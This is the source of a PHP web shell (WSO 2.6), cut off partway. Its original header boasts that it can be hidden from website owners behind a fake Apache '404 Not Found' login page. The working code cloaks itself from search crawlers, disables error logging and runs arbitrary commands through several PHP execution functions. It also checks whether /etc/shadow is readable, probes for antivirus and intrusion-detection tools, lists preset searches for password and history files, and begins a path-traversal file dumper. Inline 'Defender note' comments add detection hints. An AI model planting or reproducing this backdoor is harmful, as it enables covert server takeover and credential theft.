1<?php
2/*
3This is a private WSO Shell modification which has a "404 Not Found" page as it's login page. (To find the password input you can just open the shell location in your browser and hit the "tabulator" key (The arrow next to your caps key)). This is very useful when you want to hide the shell from the website owner!
4You can even put it into the default homepage directory and call it "404.php" the website owner will open it in his browser, see a 404 code and think that it's just his default 404 not found page so he won't delete it!
5But I still recommend you to hide it somewhere in his website.
6*/
// Configuration. $auth_pass is an unsalted MD5 hex digest of the login
// password; the session gate further down compares md5($_POST['pass'])
// against it with loose `==`. Defender note: these defaults (the digest
// value, the green colour, 'FilesMan', 'Windows-1251') are stable strings in
// unmodified copies of this file.
$auth_pass = "4f4adcbf8c6f66dcfc8a3282ac2bf10a"; //Default password is 404 . You can use http://md5online.org/md5-encrypt.html to get the md5 of the password you wish the shell to have!
$color = "#00ff00"; //Default color is green. You can use http://www.somacon.com/p142.php to get the colorcode of the color you wish the shell interface to have!
$default_action = 'FilesMan';   // action opened when no 'a' parameter is posted (dispatch not visible in this chunk)
$default_use_ajax = true;       // seeds the per-host 'ajax' session flag
$default_charset = 'Windows-1251'; // page charset when $_POST['charset'] is empty (see wsoHeader)
12
// Crawler cloaking: a request whose User-Agent matches one of the search-engine
// bot names gets a bare 404 and exits before any shell logic runs. Defender
// note: the response therefore depends on the User-Agent, so a scan of this
// URL with a crawler UA never sees the login form; compare responses across
// user agents when triaging suspicious "404" pages.
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    // The names are joined into one alternation and matched case-insensitively.
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
20
// Runtime setup. Every call is @-suppressed so a failure never reaches the
// page or the log.
@session_start();
@ini_set('error_log',NULL);         // drop the error log destination ...
@ini_set('log_errors',0);           // ... and stop logging errors entirely
@ini_set('max_execution_time',0);   // no execution time limit
@set_time_limit(0);
// set_magic_quotes_runtime() was removed in PHP 7.0; on such versions this is
// a call to an undefined function, which @ does not suppress.
@set_magic_quotes_runtime(0);
// Also appears in the <title> emitted by wsoHeader ("<host> - WSO 2.6") - a
// stable string to match on in served HTML.
@define('WSO_VERSION', '2.6');
28
// Undo magic_quotes_gpc escaping on the POST data so the shell sees raw input.
// get_magic_quotes_gpc() was removed in PHP 8.0, so this line is a fatal call
// to an undefined function on PHP 8+.
if(get_magic_quotes_gpc()) {
    // Recursively strips slashes from nested POST arrays.
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
}
35
/**
 * Login gate disguised as an Apache "404 Not Found" page.
 *
 * Prints a static 404 body followed by a password form whose input is styled
 * white on white, then dies.
 *
 * Defender notes: the <address> banner is a fixed string ("Apache/2.2.22
 * (Unix) mod_ssl/2.2.22 ...") that does not come from the real server, so it
 * will disagree with the genuine Server header and with the host's real 404
 * page; and the body contains a <form method=post> with an
 * <input type=password name=pass>, which a genuine error page never has.
 * Diffing a suspicious 404 body against the server's known error document
 * exposes both.
 */
function wsoLogin() {
    die("<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80</address>
 <style>
 input { margin:0;background-color:#fff;border:1px solid #fff; }
 </style>
 <pre align=center>
 <form method=post>
 <input type=password name=pass>
 </form></pre>");
}
// Session gate. The "logged in" marker is $_SESSION[md5(HTTP_HOST)] = true.
// Without the marker, access is granted when $auth_pass is empty or when the
// MD5 of the posted password loosely (==) equals $auth_pass; otherwise the
// fake 404 login page is shown and the script exits.
// Defender note: a session file containing a key that is a 32-hex-char MD5
// of the site's hostname with value true is an indicator that this shell was
// authenticated to from that session.
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
        wsoLogin();
55
// Coarse OS detection from the first three characters of PHP_OS: 'win' or 'nix'.
if(strtolower(substr(PHP_OS,0,3)) == "win")
    $os = 'win';
else
    $os = 'nix';
60
// safe_mode no longer exists on modern PHP, so ini_get() returns false there
// and all error reporting is switched off.
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
    error_reporting(0);
64
// Working-directory handling. $home_cwd is the directory the script started
// in; the posted 'c' parameter (untrusted, used as-is) is applied with chdir()
// and the resulting directory becomes $cwd, normalised to forward slashes and
// a trailing '/'. $disable_functions is read here for wsoHeader/actionSecInfo.
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
    @chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
    $home_cwd = str_replace("\\", "/", $home_cwd);
    $cwd = str_replace("\\", "/", $cwd);
}
// If getcwd() failed, $cwd is false here and this indexes a non-string.
if( $cwd[strlen($cwd)-1] != '/' )
    $cwd .= '/';
76
// Per-host session flag for whether the UI submits via the AJAX path (the
// a()/sr() JavaScript emitted by wsoHeader); seeded from $default_use_ajax.
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
    $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax'];
79
// Preset command lines offered in the Console action, keyed by menu label.
// Entries with an empty command ("Find", "Locate") are section headings.
// Defender note: when a preset is used, these exact command lines are what
// run under the web-server user and what appear in process-execution audit
// logs (execve of find/locate/netstat/net.exe spawned by the PHP process).
if($os == 'win')
    $aliases = array(
        "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
        "ARP Table" => "arp -a",
        "IP Configuration" => "ipconfig /all"
    );
else
    $aliases = array(
        "List dir" => "ls -lha",
        "list file attributes on a Linux second extended file system" => "lsattr -va",
        "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
        "Find" => "",
        "find all suid files" => "find / -type f -perm -04000 -ls",
        "find suid files in current dir" => "find . -type f -perm -04000 -ls",
        "find all sgid files" => "find / -type f -perm -02000 -ls",
        "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
        "find config.inc.php files" => "find / -type f -name config.inc.php",
        "find config* files" => "find / -type f -name \"config*\"",
        "find config* files in current dir" => "find . -type f -name \"config*\"",
        "find all writable folders and files" => "find / -perm -2 -ls",
        "find all writable folders and files in current dir" => "find . -perm -2 -ls",
        "find all service.pwd files" => "find / -type f -name service.pwd",
        "find service.pwd files in current dir" => "find . -type f -name service.pwd",
        "find all .htpasswd files" => "find / -type f -name .htpasswd",
        "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
        "find all .bash_history files" => "find / -type f -name .bash_history",
        "find .bash_history files in current dir" => "find . -type f -name .bash_history",
        "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
        "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
        "Locate" => "",
        "locate httpd.conf files" => "locate httpd.conf",
        "locate vhosts.conf files" => "locate vhosts.conf",
        "locate proftpd.conf files" => "locate proftpd.conf",
        "locate psybnc.conf files" => "locate psybnc.conf",
        "locate my.conf files" => "locate my.conf",
        "locate admin.php files" =>"locate admin.php",
        "locate cfg.php files" => "locate cfg.php",
        "locate conf.php files" => "locate conf.php",
        "locate config.dat files" => "locate config.dat",
        "locate config.php files" => "locate config.php",
        "locate config.inc files" => "locate config.inc",
        "locate config.inc.php" => "locate config.inc.php",
        "locate config.default.php files" => "locate config.default.php",
        "locate config* files " => "locate config",
        "locate .conf files"=>"locate '.conf'",
        "locate .pwd files" => "locate '.pwd'",
        "locate .sql files" => "locate '.sql'",
        "locate .htpasswd files" => "locate '.htpasswd'",
        "locate .bash_history files" => "locate '.bash_history'",
        "locate .mysql_history files" => "locate '.mysql_history'",
        "locate .fetchmailrc files" => "locate '.fetchmailrc'",
        "locate backup files" => "locate backup",
        "locate dump files" => "locate dump",
        "locate priv files" => "locate priv"
    );
142
/**
 * Emits the top of every shell page: the <head> with inline CSS and JS, a
 * hidden form (name=mf) through which all navigation is posted, the
 * host/user/disk information table, and the action menu.
 *
 * Reads $_POST (charset, a, p1..p3), $GLOBALS (cwd, home_cwd, os, safe_mode,
 * auth_pass, default_charset, color) and $_SERVER; writes $_POST['charset']
 * when it is empty.
 *
 * Defender notes:
 *  - The <title> is "<host> - WSO 2.6" (WSO_VERSION), a stable string in the
 *    served HTML.
 *  - $_POST['charset'] is interpolated into the <meta> tag unescaped, while
 *    the JS constants below it are htmlspecialchars()-escaped; the hidden
 *    form posts the parameters a, c, p1, p2, p3 and charset on every action.
 *  - The AJAX path (sr()/processReqChange()) eval()s the response body after
 *    a decimal length prefix, i.e. the server answers with JavaScript to run.
 *  - The info table discloses uname, uid/gid, PHP version, disk usage, the
 *    server and client IPs and the full working path to whoever is logged in.
 */
function wsoHeader() {
    if(empty($_POST['charset']))
        $_POST['charset'] = $GLOBALS['default_charset'];
    global $color;
    echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
<style>
body {background-color:#000;color:#fff;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border:1px solid $color;padding: 2px 5px;font: 14pt Verdana;margin:0px; }
div.content{ padding: 5px;margin-left:5px;}
a{ text-decoration:none; }
a:hover{ background:#ff0000; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input, textarea, select{ margin:0;color:#00ff00;background-color:#000;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 80%; }
.main th{text-align:left;}
.main tr:hover{background-color:#5e5e5e;}
.main td, th{vertical-align:middle;}
pre{font-family:Courier,Monospace;}
#cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
</style>
<script>
 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
 var d = document;
 function set(a,c,p1,p2,p3,charset) {
 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
 }
 function g(a,c,p1,p2,p3,charset) {
 set(a,c,p1,p2,p3,charset);
 d.mf.submit();
 }
 function a(a,c,p1,p2,p3,charset) {
 set(a,c,p1,p2,p3,charset);
 var params = 'ajax=true';
 for(i=0;i<d.mf.elements.length;i++)
 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
 sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
 }
 function sr(url, params) {
 if (window.XMLHttpRequest)
 req = new XMLHttpRequest();
 else if (window.ActiveXObject)
 req = new ActiveXObject('Microsoft.XMLHTTP');
 if (req) {
 req.onreadystatechange = processReqChange;
 req.open('POST', url, true);
 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
 req.send(params);
 }
 }
 function processReqChange() {
 if( (req.readyState == 4) )
 if(req.status == 200) {
 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
 var arr=reg.exec(req.responseText);
 eval(arr[2].substr(0, arr[1]));
 } else alert('Request error!');
 }
</script>
<head><body><div style='position:absolute;width:100%;background-color:#000;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>

<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
    // Disk figures for the current directory; the total is forced to 1 so the
    // percentage below never divides by zero.
    $freeSpace = @diskfreespace($GLOBALS['cwd']);
    $totalSpace = @disk_total_space($GLOBALS['cwd']);
    $totalSpace = $totalSpace?$totalSpace:1;
    $release = @php_uname('r'); // not used below
    $kernel = @php_uname('s');  // not used below
    // Effective user/group: via posix_* when the extension is present,
    // otherwise the script owner from get_current_user()/getmyuid()/getmygid()
    // with the group left as "?".
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
    } else {
        $uid = @posix_getpwuid(posix_geteuid());
        $gid = @posix_getgrgid(posix_getegid());
        $user = $uid['name'];
        $uid = $uid['uid'];
        $group = $gid['name'];
        $gid = $gid['gid'];
    }

    // Breadcrumb: one FilesMan link per path component of $cwd, each carrying
    // the path up to that component.
    $cwd_links = '';
    $path = explode("/", $GLOBALS['cwd']);
    $n=count($path);
    for($i=0; $i<$n-1; $i++) {
        $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
        for($j=0; $j<=$i; $j++)
            $cwd_links .= $path[$j].'/';
        $cwd_links .= "\")'>".$path[$i]."/</a>";
    }

    // Charset selector; the posted charset is preselected.
    $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    $opt_charsets = '';
    foreach($charsets as $item)
        $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';

    // Action menu, label => action name. The names presumably map to the
    // action<Name>() handlers (actionSecInfo and actionlfiscan are visible in
    // this file; the dispatcher is not). Logout is offered only when a
    // password is configured.
    $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network');
    if(!empty($GLOBALS['auth_pass']))
        $m['Logout'] = 'Logout';
    $m['Self remove'] = 'SelfRemove';
    $menu = '';
    foreach($m as $k => $v)
        $menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';

    // On Windows, probe drive letters c..z with is_dir() and link those that exist.
    $drives = "";
    if($GLOBALS['os'] == 'win') {
        foreach(range('c','z') as $drive)
            if(is_dir($drive.':\\'))
                $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
    }
    // Info table (uname, user/group, PHP version + safe_mode state, disk usage,
    // breadcrumb with permission colouring, drives) and the menu row.
    echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
        . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
        . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
        . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
        . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
}
281
/**
 * Emits the bottom of every shell page: the tools table (change dir, read
 * file, make dir, make file, execute, upload) and the closing tags.
 *
 * Reads $GLOBALS['cwd'] and $_POST['charset'].
 *
 * Defender notes: the "Execute" form submits to the Console action through
 * g(), and the upload form is a plain multipart POST carrying a=FilesMAn,
 * p1=uploadFile and a file field named f - a request body with that
 * parameter set is a usable signature. $GLOBALS['cwd'] is escaped with
 * htmlspecialchars() in the first form but emitted raw into the hidden 'c'
 * input of the upload form.
 */
function wsoFooter() {
    $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
    echo "

</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
 <tr>
 <td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
 <td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
 </tr><tr>
 <td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
 <td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>

 </tr><tr>
 <td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
 <td><form method='post' ENCTYPE='multipart/form-data'>
 <input type=hidden name=a value='FilesMAn'>
 <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
 <input type=hidden name=p1 value='uploadFile'>
 <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>

 </tr></table></div></body></html>";
}
306
// Stub the two posix_* lookups when they are absent, so the user/group code in
// wsoHeader gets false instead of an undefined-function error. The extra
// strpos() check skips the stub when the name is in disable_functions,
// presumably because declaring a disabled name would itself fail.
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
    function posix_getpwuid($p) {return false;}
}
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
    function posix_getgrgid($p) {return false;}
}
311
/**
 * Runs a command line and returns its output as a string.
 *
 * Tries, in order, exec(), passthru(), system(), shell_exec() and popen(),
 * using the first one that exists; with none available it returns ''.
 * Output of passthru()/system() is captured with output buffering.
 *
 * Defender note: this is the single command-execution sink used by the rest
 * of the shell, so disable_functions has to cover all five names (exec,
 * passthru, system, shell_exec, popen) to neutralise it - blocking only some
 * of them just moves execution to the next branch. Every call is
 * @-suppressed, so a refused call produces no warning in the log.
 *
 * @param string $in command line, handed to the shell unmodified
 * @return string|null command output ('' when no sink exists; shell_exec()
 *                     can return null)
 */
function wsoEx($in) {
    $out = '';
    if (function_exists('exec')) {
        @exec($in,$out);
        $out = @join("\n",$out);
    } elseif (function_exists('passthru')) {
        ob_start();
        @passthru($in);
        $out = ob_get_clean();
    } elseif (function_exists('system')) {
        ob_start();
        @system($in);
        $out = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
        $out = shell_exec($in);
    } elseif (is_resource($f = @popen($in,"r"))) {
        // Last resort: read the pipe in 1 KiB chunks until EOF.
        $out = "";
        while(!@feof($f))
            $out .= fread($f,1024);
        pclose($f);
    }
    return $out;
}
/**
 * Formats a byte count for display: GB, MB or KB with two decimals (binary
 * multiples of 1024), or "<n> B" below 1024.
 *
 * @param int|float $s byte count
 * @return string human-readable size
 */
function wsoViewSize($s) {
    if($s >= 1073741824)
        return sprintf('%1.2f', $s / 1073741824 ). ' GB';
    elseif($s >= 1048576)
        return sprintf('%1.2f', $s / 1048576 ) . ' MB';
    elseif($s >= 1024)
        return sprintf('%1.2f', $s / 1024 ) . ' KB';
    else
        return $s . ' B';
}
345
/**
 * Renders a fileperms() mode value as an ls-style string, e.g. "drwxr-xr-x".
 *
 * The first character is the file type from the high mode bits (socket 's',
 * symlink 'l', regular file '-', block 'b', directory 'd', char device 'c',
 * fifo 'p', anything else 'u'); the nine permission bits follow, with setuid,
 * setgid and sticky shown as s/S, s/S and t/T depending on whether the
 * matching execute bit is set.
 *
 * @param int $p mode bits as returned by fileperms()/stat
 * @return string ten-character permission string
 */
function wsoPerms($p) {
    if (($p & 0xC000) == 0xC000)$i = 's';
    elseif (($p & 0xA000) == 0xA000)$i = 'l';
    elseif (($p & 0x8000) == 0x8000)$i = '-';
    elseif (($p & 0x6000) == 0x6000)$i = 'b';
    elseif (($p & 0x4000) == 0x4000)$i = 'd';
    elseif (($p & 0x2000) == 0x2000)$i = 'c';
    elseif (($p & 0x1000) == 0x1000)$i = 'p';
    else $i = 'u';
    // owner
    $i .= (($p & 0x0100) ? 'r' : '-');
    $i .= (($p & 0x0080) ? 'w' : '-');
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
    // group
    $i .= (($p & 0x0020) ? 'r' : '-');
    $i .= (($p & 0x0010) ? 'w' : '-');
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
    // others
    $i .= (($p & 0x0004) ? 'r' : '-');
    $i .= (($p & 0x0002) ? 'w' : '-');
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
    return $i;
}
366
/**
 * wsoPerms() for path $f wrapped in a <font> coloured by the PHP process's
 * access: red when not readable, white when readable but not writable, green
 * when writable. All filesystem checks are @-suppressed.
 *
 * @param string $f filesystem path
 * @return string HTML fragment
 */
function wsoPermsColor($f) {
    if (!@is_readable($f))
        return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
    elseif (!@is_writable($f))
        return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
    else
        return '<font color=#00BB00>' . wsoPerms(@fileperms($f)) . '</font>';
}
375
// Fallback scandir() for PHP builds without it. Unlike the builtin it does not
// sort, does not check that opendir() succeeded (a failed open leaves $dh
// false, the loop never runs and an undefined $files is returned), and never
// closes the handle - closedir() is missing.
if(!function_exists("scandir")) {
    function scandir($dir) {
        $dh = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}
384
/**
 * Locates a binary by running `which <name>` through wsoEx().
 *
 * $p is concatenated into the command line unquoted; the callers visible in
 * this file pass fixed names from hard-coded lists.
 *
 * @param string $p program name
 * @return string|false the output of `which` (non-empty), or false
 */
function wsoWhich($p) {
    $path = wsoEx('which ' . $p);
    if(!empty($path))
        return $path;
    return false;
}
391
/**
 * "Sec Info" action: renders a server reconnaissance page between wsoHeader()
 * and wsoFooter().
 *
 * Reports server software, loaded Apache modules, disable_functions,
 * open_basedir, the safe_mode dirs, cURL availability and the DB client
 * extensions present. On *nix it adds readability of /etc/passwd and
 * /etc/shadow, /proc/version, /etc/issue.net and - unless safe_mode is on -
 * `which` lookups for compilers/interpreters/archivers ("Userful"), for
 * security tooling such as AV, rootkit checkers, HIDS and firewall binaries
 * ("Danger") and for download tools, then `df -h` and /etc/hosts. On Windows
 * it runs ver, net accounts and net user.
 *
 * Defender notes: the *nix branch spawns one `which <name>` process per entry
 * of the three lists below, all from the web-server user - a burst of which/
 * df children of the PHP process is a high-signal detection for this page
 * being opened. The helper wsoSecParam() is declared inside the function, so
 * a second call in the same request would be a redeclaration error. Values
 * are echoed without escaping.
 */
function actionSecInfo() {
    wsoHeader();
    echo '<h1>Server security information</h1><div class=content>';
    // Prints "<label>: <value>", skipping falsy values after trim(); values
    // containing a newline go into a <pre> block.
    function wsoSecParam($n, $v) {
        $v = trim($v);
        if($v) {
            echo '<span>' . $n . ': </span>';
            if(strpos($v, "\n") === false)
                echo $v . '<br>';
            else
                echo '<pre class=ml1>' . $v . '</pre>';
        }
    }
    wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
    if(function_exists('apache_get_modules'))
        wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
    wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
    wsoSecParam('Open base dir', @ini_get('open_basedir'));
    wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    // DB client extensions, detected by the presence of their connect functions.
    $temp=array();
    if(function_exists('mysql_get_client_info'))
        $temp[] = "MySql (".mysql_get_client_info().")";
    if(function_exists('mssql_connect'))
        $temp[] = "MSSQL";
    if(function_exists('pg_connect'))
        $temp[] = "PostgreSQL";
    if(function_exists('oci_connect'))
        $temp[] = "Oracle";
    wsoSecParam('Supported databases', implode(', ', $temp));
    echo '<br>';

    if($GLOBALS['os'] == 'nix') {
        wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
        wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
        wsoSecParam('OS version', @file_get_contents('/proc/version'));
        wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
        if(!$GLOBALS['safe_mode']) {
            // Each list is probed one name at a time with wsoWhich().
            $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
            $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
            $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
            echo '<br>';
            $temp=array();
            foreach ($userful as $item)
                if(wsoWhich($item))
                    $temp[] = $item;
            wsoSecParam('Userful', implode(', ',$temp));
            $temp=array();
            foreach ($danger as $item)
                if(wsoWhich($item))
                    $temp[] = $item;
            wsoSecParam('Danger', implode(', ',$temp));
            $temp=array();
            foreach ($downloaders as $item)
                if(wsoWhich($item))
                    $temp[] = $item;
            wsoSecParam('Downloaders', implode(', ',$temp));
            echo '<br/>';
            wsoSecParam('HDD space', wsoEx('df -h'));
            wsoSecParam('Hosts', @file_get_contents('/etc/hosts'));
        }
    } else {
        wsoSecParam('OS Version',wsoEx('ver'));
        wsoSecParam('Account Settings',wsoEx('net accounts'));
        wsoSecParam('User Accounts',wsoEx('net user'));
    }
    echo '</div>';
    wsoFooter();
}
462function actionlfiscan() {
463 wsoHeader();
464 print '
465 <h3>Led-Zeppelin\'s LFI File dumper</h3>
466
467 <form method="post" action="?"><input type="hidden" name="a" value="lfiscan">
468 LFI URL: <input type="text" size="60" name="lfiurl" value=""> <input type="submit" value="Go"> File: <select name="scantype">
469 <option value="1">
470 Access Log
471 </option>
472
473 <option value="2">
474 httpd.conf
475 </option>
476
477 <option value="3">
478 Error Log
479 </option>
480 <option value="4">
481 php.ini
482 </option>
483 <option value="5">
484 MySQL
485 </option>
486 <option value="6">
487 FTP
488 </option>
489 <option value="7">
490 Environ
491 </option>
492 </select> Null: <select name="null">
493 <option value="%00">
494 Yes
495 </option>
496
497 <option value="">
498 No
499 </option>
500 </select> User-Agent: <input type="text" size="20" name="custom_header" value="">
501 </form>';
502 error_reporting(0);
503 if($_POST['lfiurl']) {
504 print "<pre>";
505 $cheader = $_POST['custom_header'];
506 $target = $_POST['lfiurl'];
507 $type = $_POST['scantype'];
508 $byte1 = $_POST['null'];
509 $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";
510 $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";
511 $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";
512 $lfiaccess = array(
